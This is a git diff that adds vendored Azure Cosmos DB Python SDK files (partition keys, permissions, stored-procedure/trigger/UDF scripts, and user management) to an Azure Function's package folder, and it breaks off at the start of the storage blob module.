""" + + +class _Empty(object): + """Represents empty value for partitionKey when it's missing in an item belonging + to a migrated container. + """ + + +class _Undefined(object): + """Represents undefined value for partitionKey when it's missing in an item belonging + to a multi-partition container. + """ + + +class PartitionKey(dict): + """Key used to partition a container into logical partitions. + + See https://docs.microsoft.com/azure/cosmos-db/partitioning-overview#choose-partitionkey + for information on how to choose partition keys. 
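+
+    A minimal, illustrative sketch (the database object and the "/id" path are
+    assumptions for this example, not part of the original source):
+
+        container = database.create_container(id="products", partition_key=PartitionKey(path="/id"))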
+
+    :ivar path: The path of the partition key
+    :ivar kind: What kind of partition key is being defined (default: "Hash")
+    :ivar version: The version of the partition key (default: 2)
+    """
+
+    def __init__(self, path, kind="Hash", version=2):  # pylint: disable=super-init-not-called
+        # type: (str, str, int) -> None
+        self.path = path
+        self.kind = kind
+        self.version = version
+
+    def __repr__(self):
+        # type: () -> str
+        return "<PartitionKey [{}]>".format(self.path)[:1024]
+
+    @property
+    def kind(self):
+        return self["kind"]
+
+    @kind.setter
+    def kind(self, value):
+        self["kind"] = value
+
+    @property
+    def path(self):
+        # type: () -> str
+        return self["paths"][0]
+
+    @path.setter
+    def path(self, value):
+        # type: (str) -> None
+        self["paths"] = [value]
+
+    @property
+    def version(self):
+        return self["version"]
+
+    @version.setter
+    def version(self, value):
+        self["version"] = value
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/permission.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/permission.py
new file mode 100644
index 0000000..de037e8
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/permission.py
@@ -0,0 +1,39 @@
+# The MIT License (MIT)
+# Copyright (c) 2014 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Create permissions in the Azure Cosmos DB SQL API service.
+"""
+from typing import Dict, Any, Union
+
+from .documents import PermissionMode
+
+
+class Permission(object):
+    """Represents a Permission object in the Azure Cosmos DB SQL API service.
+ """ + def __init__(self, id, user_link, permission_mode, resource_link, properties): # pylint: disable=redefined-builtin + # type: (str, str, Union[str, PermissionMode], str, Dict[str, Any]) -> None + self.id = id + self.user_link = user_link + self.permission_mode = permission_mode + self.resource_link = resource_link + self.properties = properties + self.permission_link = u"{}/permissions/{}".format(self.user_link, self.id) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/scripts.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/scripts.py new file mode 100644 index 0000000..3b98c82 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/scripts.py @@ -0,0 +1,422 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, update and delete and execute scripts in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, List, Dict, Union, Iterable, Optional + +from azure.cosmos._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from .partition_key import NonePartitionKeyValue + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class ScriptType(object): + StoredProcedure = "sprocs" + Trigger = "triggers" + UserDefinedFunction = "udfs" + + +class ScriptsProxy(object): + """An interface to interact with stored procedures. + + This class should not be instantiated directly. Instead, use the + :func:`ContainerProxy.scripts` attribute. 
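+
+    Besides stored procedures, the proxy also covers triggers and user-defined functions.
+    A minimal, illustrative sketch (the container object, the sproc id and the partition
+    key value are assumptions, not part of the original source):
+
+        result = container.scripts.execute_stored_procedure("spHello", partition_key="pk-1")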
+    """
+
+    def __init__(self, client_connection, container_link, is_system_key):
+        # type: (CosmosClientConnection, str, bool) -> None
+        self.client_connection = client_connection
+        self.container_link = container_link
+        self.is_system_key = is_system_key
+
+    def _get_resource_link(self, script_or_id, typ):
+        # type: (Union[Dict[str, Any], str], str) -> str
+        if isinstance(script_or_id, str):
+            return u"{}/{}/{}".format(self.container_link, typ, script_or_id)
+        return script_or_id["_self"]
+
+    def list_stored_procedures(self, max_item_count=None, **kwargs):
+        # type: (Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """List all stored procedures in the container.
+
+        :param int max_item_count: Max number of items to be returned in the enumeration operation.
+        :returns: An Iterable of stored procedures (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        return self.client_connection.ReadStoredProcedures(
+            collection_link=self.container_link, options=feed_options, **kwargs
+        )
+
+    def query_stored_procedures(self, query, parameters=None, max_item_count=None, **kwargs):
+        # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """Return all stored procedures matching the given `query`.
+
+        :param query: The Azure Cosmos DB SQL query to execute.
+        :param parameters: Optional array of parameters to the query. Ignored if no query is provided.
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :returns: An Iterable of stored procedures (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        return self.client_connection.QueryStoredProcedures(
+            collection_link=self.container_link,
+            query=query if parameters is None else dict(query=query, parameters=parameters),
+            options=feed_options,
+            **kwargs
+        )
+
+    def get_stored_procedure(self, sproc, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Any) -> Dict[str, Any]
+        """Get the stored procedure identified by `id`.
+
+        :param sproc: The ID (name) or dict representing stored procedure to retrieve.
+        :returns: A dict representing the retrieved stored procedure.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be retrieved.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.ReadStoredProcedure(
+            sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs
+        )
+
+    def create_stored_procedure(self, body, **kwargs):
+        # type: (Dict[str, Any], Any) -> Dict[str, Any]
+        """Create a new stored procedure in the container.
+
+        To replace an existing sproc, use the :func:`ContainerProxy.scripts.replace_stored_procedure` method.
+
+        :param body: A dict-like object representing the sproc to create.
+        :returns: A dict representing the new stored procedure.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be created.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.CreateStoredProcedure(
+            collection_link=self.container_link, sproc=body, options=request_options, **kwargs
+        )
+
+    def replace_stored_procedure(self, sproc, body, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Dict[str, Any], Any) -> Dict[str, Any]
+        """Replace a specified stored procedure in the container.
+
+        If the stored procedure does not already exist in the container, an exception is raised.
+
+        :param sproc: The ID (name) or dict representing stored procedure to be replaced.
+        :param body: A dict-like object representing the sproc to replace.
+        :returns: A dict representing the stored procedure after replace went through.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the stored
+            procedure with given id does not exist.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.ReplaceStoredProcedure(
+            sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure),
+            sproc=body,
+            options=request_options,
+            **kwargs
+        )
+
+    def delete_stored_procedure(self, sproc, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Any) -> None
+        """Delete a specified stored procedure from the container.
+
+        If the stored procedure does not already exist in the container, an exception is raised.
+
+        :param sproc: The ID (name) or dict representing stored procedure to be deleted.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The sproc wasn't deleted successfully.
+        :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The sproc does not exist in the container.
+        :rtype: None
+        """
+        request_options = build_options(kwargs)
+
+        self.client_connection.DeleteStoredProcedure(
+            sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs
+        )
+
+    def execute_stored_procedure(
+        self,
+        sproc,  # type: Union[str, Dict[str, Any]]
+        partition_key=None,  # type: Optional[str]
+        params=None,  # type: Optional[List[Any]]
+        enable_script_logging=None,  # type: Optional[bool]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> Any
+        """Execute a specified stored procedure.
+
+        If the stored procedure does not already exist in the container, an exception is raised.
+
+        :param sproc: The ID (name) or dict representing stored procedure to be executed.
+        :param partition_key: Specifies the partition key to indicate which partition the sproc should execute on.
+        :param params: List of parameters to be passed to the stored procedure to be executed.
+        :param bool enable_script_logging: Enables or disables script logging for the current request.
+        :returns: Result of the executed stored procedure for the given parameters.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the stored procedure execution failed
+            or if the stored procedure with given id does not exist in the container.
+        :rtype: dict[str, Any]
+        """
+
+        request_options = build_options(kwargs)
+        if partition_key is not None:
+            request_options["partitionKey"] = (
+                CosmosClientConnection._return_undefined_or_empty_partition_key(self.is_system_key)
+                if partition_key == NonePartitionKeyValue
+                else partition_key
+            )
+        if enable_script_logging is not None:
+            request_options["enableScriptLogging"] = enable_script_logging
+
+        return self.client_connection.ExecuteStoredProcedure(
+            sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure),
+            params=params,
+            options=request_options,
+            **kwargs
+        )
+
+    def list_triggers(self, max_item_count=None, **kwargs):
+        # type: (Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """List all triggers in the container.
+
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :returns: An Iterable of triggers (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        return self.client_connection.ReadTriggers(
+            collection_link=self.container_link, options=feed_options, **kwargs
+        )
+
+    def query_triggers(self, query, parameters=None, max_item_count=None, **kwargs):
+        # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """Return all triggers matching the given `query`.
+
+        :param query: The Azure Cosmos DB SQL query to execute.
+        :param parameters: Optional array of parameters to the query. Ignored if no query is provided.
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :returns: An Iterable of triggers (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        return self.client_connection.QueryTriggers(
+            collection_link=self.container_link,
+            query=query if parameters is None else dict(query=query, parameters=parameters),
+            options=feed_options,
+            **kwargs
+        )
+
+    def get_trigger(self, trigger, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Any) -> Dict[str, Any]
+        """Get a trigger identified by `id`.
+
+        :param trigger: The ID (name) or dict representing trigger to retrieve.
+        :returns: A dict representing the retrieved trigger.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be retrieved.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.ReadTrigger(
+            trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs
+        )
+
+    def create_trigger(self, body, **kwargs):
+        # type: (Dict[str, Any], Any) -> Dict[str, Any]
+        """Create a trigger in the container.
+
+        To replace an existing trigger, use the :func:`ContainerProxy.scripts.replace_trigger` method.
+
+        :param body: A dict-like object representing the trigger to create.
+        :returns: A dict representing the new trigger.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be created.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.CreateTrigger(
+            collection_link=self.container_link, trigger=body, options=request_options, **kwargs
+        )
+
+    def replace_trigger(self, trigger, body, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Dict[str, Any], Any) -> Dict[str, Any]
+        """Replace a specified trigger in the container.
+
+        If the trigger does not already exist in the container, an exception is raised.
+
+        :param trigger: The ID (name) or dict representing trigger to be replaced.
+        :param body: A dict-like object representing the trigger to replace.
+        :returns: A dict representing the trigger after replace went through.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the trigger with given
+            id does not exist.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.ReplaceTrigger(
+            trigger_link=self._get_resource_link(trigger, ScriptType.Trigger),
+            trigger=body,
+            options=request_options,
+            **kwargs
+        )
+
+    def delete_trigger(self, trigger, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Any) -> None
+        """Delete a specified trigger from the container.
+
+        If the trigger does not already exist in the container, an exception is raised.
+
+        :param trigger: The ID (name) or dict representing trigger to be deleted.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The trigger wasn't deleted successfully.
+        :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The trigger does not exist in the container.
+        :rtype: None
+        """
+        request_options = build_options(kwargs)
+
+        self.client_connection.DeleteTrigger(
+            trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs
+        )
+
+    def list_user_defined_functions(self, max_item_count=None, **kwargs):
+        # type: (Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """List all the user-defined functions in the container.
+
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :returns: An Iterable of user-defined functions (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        return self.client_connection.ReadUserDefinedFunctions(
+            collection_link=self.container_link, options=feed_options, **kwargs
+        )
+
+    def query_user_defined_functions(self, query, parameters=None, max_item_count=None, **kwargs):
+        # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """Return user-defined functions matching a given `query`.
+
+        :param query: The Azure Cosmos DB SQL query to execute.
+        :param parameters: Optional array of parameters to the query. Ignored if no query is provided.
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :returns: An Iterable of user-defined functions (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        return self.client_connection.QueryUserDefinedFunctions(
+            collection_link=self.container_link,
+            query=query if parameters is None else dict(query=query, parameters=parameters),
+            options=feed_options,
+            **kwargs
+        )
+
+    def get_user_defined_function(self, udf, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Any) -> Dict[str, Any]
+        """Get a user-defined function identified by `id`.
+
+        :param udf: The ID (name) or dict representing udf to retrieve.
+        :returns: A dict representing the retrieved user-defined function.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be retrieved.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.ReadUserDefinedFunction(
+            udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs
+        )
+
+    def create_user_defined_function(self, body, **kwargs):
+        # type: (Dict[str, Any], Any) -> Dict[str, Any]
+        """Create a user-defined function in the container.
+
+        To replace an existing UDF, use the :func:`ContainerProxy.scripts.replace_user_defined_function` method.
+
+        :param body: A dict-like object representing the udf to create.
+        :returns: A dict representing the new user-defined function.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be created.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.CreateUserDefinedFunction(
+            collection_link=self.container_link, udf=body, options=request_options, **kwargs
+        )
+
+    def replace_user_defined_function(self, udf, body, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Dict[str, Any], Any) -> Dict[str, Any]
+        """Replace a specified user-defined function in the container.
+
+        If the UDF does not already exist in the container, an exception is raised.
+
+        :param udf: The ID (name) or dict representing udf to be replaced.
+        :param body: A dict-like object representing the udf to replace.
+        :returns: A dict representing the user-defined function after replace went through.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the user-defined function
+            with the given id does not exist.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+
+        return self.client_connection.ReplaceUserDefinedFunction(
+            udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction),
+            udf=body,
+            options=request_options,
+            **kwargs
+        )
+
+    def delete_user_defined_function(self, udf, **kwargs):
+        # type: (Union[str, Dict[str, Any]], Any) -> None
+        """Delete a specified user-defined function from the container.
+
+        If the UDF does not already exist in the container, an exception is raised.
+
+        :param udf: The ID (name) or dict representing udf to be deleted.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The udf wasn't deleted successfully.
+        :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The UDF does not exist in the container.
+ :rtype: None + """ + request_options = build_options(kwargs) + + self.client_connection.DeleteUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/user.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/user.py new file mode 100644 index 0000000..8698134 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/user.py @@ -0,0 +1,296 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +"""Create, read, update and delete users in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, List, Dict, Union, cast, Iterable, Optional + +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from .permission import Permission + + +class UserProxy(object): + """An interface to interact with a specific user. + + This class should not be instantiated directly. Instead, use the + :func:`DatabaseProxy.get_user_client` method. 
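+
+    A user is the entity to which Cosmos DB permissions are granted. A minimal,
+    illustrative sketch (the database object and the ids are assumptions, not part
+    of the original source):
+
+        user = database.get_user_client("user-1")
+        for permission in user.list_permissions():
+            print(permission["id"])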
+    """
+
+    def __init__(self, client_connection, id, database_link, properties=None):  # pylint: disable=redefined-builtin
+        # type: (CosmosClientConnection, str, str, Dict[str, Any]) -> None
+        self.client_connection = client_connection
+        self.id = id
+        self.user_link = u"{}/users/{}".format(database_link, id)
+        self._properties = properties
+
+    def __repr__(self):
+        # type: () -> str
+        return "<UserProxy [{}]>".format(self.user_link)[:1024]
+
+    def _get_permission_link(self, permission_or_id):
+        # type: (Union[Permission, str, Dict[str, Any]]) -> str
+        if isinstance(permission_or_id, str):
+            return u"{}/permissions/{}".format(self.user_link, permission_or_id)
+        try:
+            return cast("Permission", permission_or_id).permission_link
+        except AttributeError:
+            pass
+        return u"{}/permissions/{}".format(self.user_link, cast("Dict[str, str]", permission_or_id)["id"])
+
+    def _get_properties(self):
+        # type: () -> Dict[str, Any]
+        if self._properties is None:
+            self._properties = self.read()
+        return self._properties
+
+    @distributed_trace
+    def read(self, **kwargs):
+        # type: (Any) -> Dict[str, Any]
+        """Read user properties.
+
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A dictionary of the retrieved user properties.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be retrieved.
+        :rtype: dict[str, Any]
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        self._properties = self.client_connection.ReadUser(user_link=self.user_link, options=request_options, **kwargs)
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, self._properties)
+
+        return cast('Dict[str, Any]', self._properties)
+
+    @distributed_trace
+    def list_permissions(self, max_item_count=None, **kwargs):
+        # type: (Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """List all permissions for the user.
+
+        :param max_item_count: Max number of permissions to be returned in the enumeration operation.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of permissions (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        result = self.client_connection.ReadPermissions(user_link=self.user_link, options=feed_options, **kwargs)
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+
+        return result
+
+    @distributed_trace
+    def query_permissions(
+        self,
+        query,
+        parameters=None,
+        max_item_count=None,
+        **kwargs
+    ):
+        # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]]
+        """Return all permissions matching the given `query`.
+
+        :param query: The Azure Cosmos DB SQL query to execute.
+        :param parameters: Optional array of parameters to the query. Ignored if no query is provided.
+        :param max_item_count: Max number of permissions to be returned in the enumeration operation.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of permissions (dicts).
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+
+        result = self.client_connection.QueryPermissions(
+            user_link=self.user_link,
+            query=query if parameters is None else dict(query=query, parameters=parameters),
+            options=feed_options,
+            **kwargs
+        )
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+
+        return result
+
+    @distributed_trace
+    def get_permission(self, permission, **kwargs):
+        # type: (str, Any) -> Permission
+        """Get the permission identified by `id`.
+
+        :param permission: The ID (name), dict representing the properties or :class:`Permission`
+            instance of the permission to be retrieved.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A :class:`Permission` object representing the retrieved permission.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be retrieved.
+        :rtype: Permission
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        permission_resp = self.client_connection.ReadPermission(
+            permission_link=self._get_permission_link(permission), options=request_options, **kwargs
+        )  # type: Dict[str, str]
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, permission_resp)
+
+        return Permission(
+            id=permission_resp["id"],
+            user_link=self.user_link,
+            permission_mode=permission_resp["permissionMode"],
+            resource_link=permission_resp["resource"],
+            properties=permission_resp,
+        )
+
+    @distributed_trace
+    def create_permission(self, body, **kwargs):
+        # type: (Dict[str, Any], Any) -> Permission
+        """Create a permission for the user.
+
+        To update or replace an existing permission, use the :func:`UserProxy.upsert_permission` method.
+
+        :param body: A dict-like object representing the permission to create.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A :class:`Permission` object representing the new permission.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be created.
+        :rtype: Permission
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        permission = self.client_connection.CreatePermission(
+            user_link=self.user_link, permission=body, options=request_options, **kwargs
+        )
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, permission)
+
+        return Permission(
+            id=permission["id"],
+            user_link=self.user_link,
+            permission_mode=permission["permissionMode"],
+            resource_link=permission["resource"],
+            properties=permission,
+        )
+
+    @distributed_trace
+    def upsert_permission(self, body, **kwargs):
+        # type: (Dict[str, Any], Any) -> Permission
+        """Insert or update the specified permission.
+
+        If the permission already exists in the container, it is replaced. If
+        the permission does not exist, it is inserted.
+
+        :param body: A dict-like object representing the permission to update or insert.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A :class:`Permission` object representing the upserted permission.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission could not be upserted.
+        :rtype: Permission
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        permission = self.client_connection.UpsertPermission(
+            user_link=self.user_link, permission=body, options=request_options, **kwargs
+        )
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, permission)
+
+        return Permission(
+            id=permission["id"],
+            user_link=self.user_link,
+            permission_mode=permission["permissionMode"],
+            resource_link=permission["resource"],
+            properties=permission,
+        )
+
+    @distributed_trace
+    def replace_permission(self, permission, body, **kwargs):
+        # type: (str, Dict[str, Any], Any) -> Permission
+        """Replaces the specified permission if it exists for the user.
+
+        If the permission does not already exist, an exception is raised.
+
+        :param permission: The ID (name), dict representing the properties or :class:`Permission`
+            instance of the permission to be replaced.
+        :param body: A dict-like object representing the permission to replace.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: A :class:`Permission` object representing the permission after the replace went through.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the permission
+            with given id does not exist.
+        :rtype: Permission
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        permission_resp = self.client_connection.ReplacePermission(
+            permission_link=self._get_permission_link(permission), permission=body, options=request_options, **kwargs
+        )  # type: Dict[str, str]
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, permission_resp)
+
+        return Permission(
+            id=permission_resp["id"],
+            user_link=self.user_link,
+            permission_mode=permission_resp["permissionMode"],
+            resource_link=permission_resp["resource"],
+            properties=permission_resp,
+        )
+
+    @distributed_trace
+    def delete_permission(self, permission, **kwargs):
+        # type: (str, Any) -> None
+        """Delete the specified permission from the user.
+
+        If the permission does not already exist, an exception is raised.
+
+        :param permission: The ID (name), dict representing the properties or :class:`Permission`
+            instance of the permission to be deleted.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The permission wasn't deleted successfully.
+        :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The permission does not exist for the user.
+        :rtype: None
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+
+        result = self.client_connection.DeletePermission(
+            permission_link=self._get_permission_link(permission), options=request_options, **kwargs
+        )
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__init__.py
new file mode 100644
index 0000000..eb3ecab
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__init__.py
@@ -0,0 +1,239 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+import os
+
+from typing import Union, Iterable, AnyStr, IO, Any, Dict  # pylint: disable=unused-import
